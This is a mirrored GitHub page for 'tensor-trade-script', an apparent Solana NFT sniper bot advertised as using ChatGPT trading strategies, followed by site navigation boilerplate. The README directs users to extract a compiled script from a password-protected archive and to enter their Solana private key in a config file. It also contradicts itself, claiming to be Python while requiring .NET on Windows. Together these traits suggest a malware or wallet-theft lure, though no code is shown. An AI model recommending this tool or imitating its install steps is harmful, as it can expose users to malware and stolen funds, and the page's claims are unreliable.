Giter Site home page Giter Site logo

origami-xyz / tensor-trade-script Goto Github PK

View Code? Open in Web Editor NEW
23.0 1.0 10.0 7 MB

Python script designed for seamless trading activities within the TensorTrade NFT marketplace, enhanced by incorporating strategies powered by ChatGPT

Python 100.00%
chatgpt minting-nfts nft-collection nft-marketplace nft-minting-scripts nft-sniper-tool openai sniper-bot tensortrade solana-bot

tensor-trade-script's Introduction

TensorTrade NFT Trading with ChatGPT Strategies

Overview

This repository contains a compiled script for seamless trading operations within the TensorTrade NFT marketplace. The script is pre-configured to leverage ChatGPT-powered strategies, enabling users to engage in NFT asset trading with advanced AI-supported decision-making capabilities.

Features

  • Utilizes a non-official API for NFT data collection.
  • Analyzes NFT collection rarity, launch time, and activity.
  • Makes informed decisions on buying or selling tokens based on comprehensive data analysis.
  • Customizable settings for personalized trading strategies.
  • Real-time monitoring and notifications for important market events.
  • Secure and efficient transaction execution.

Dependencies

  • .NET Framework 4.8
  • Nethereum
  • SolNET
  • Windows 10 and newer versions

Installation

  • Clone repository and extract files with password Ci27S0etuIh.
  • Edit tensor.json with your data and launch the script.
    • maxPosition - maximum SOL for one transaction
    • timeoutScan - timeout between scans
    • rpc - your custom RPC (or use shyft.to)
    • pkey - your SOL private key (DON'T USE MAIN TO AVOID LOSS)
    • decisionMode - criteria to make decisions to buy NFT or not

Configuration

{
  "mainSettings": { 
    "maxPosition": "0.1",
    "timeoutScan": "30",
    "rpc": "https://<your-solana-rpc>.com:<port>",
    "pkey": "<your-solana-private-key>"
  },
  "decisionMode": {
    "rarityScan": "true",
    "floorCost": "true",
    "salesActivity": "true",
    "volumeScan": "true"
  }
}

tensor-trade-script's People

Contributors

origami-xyz avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.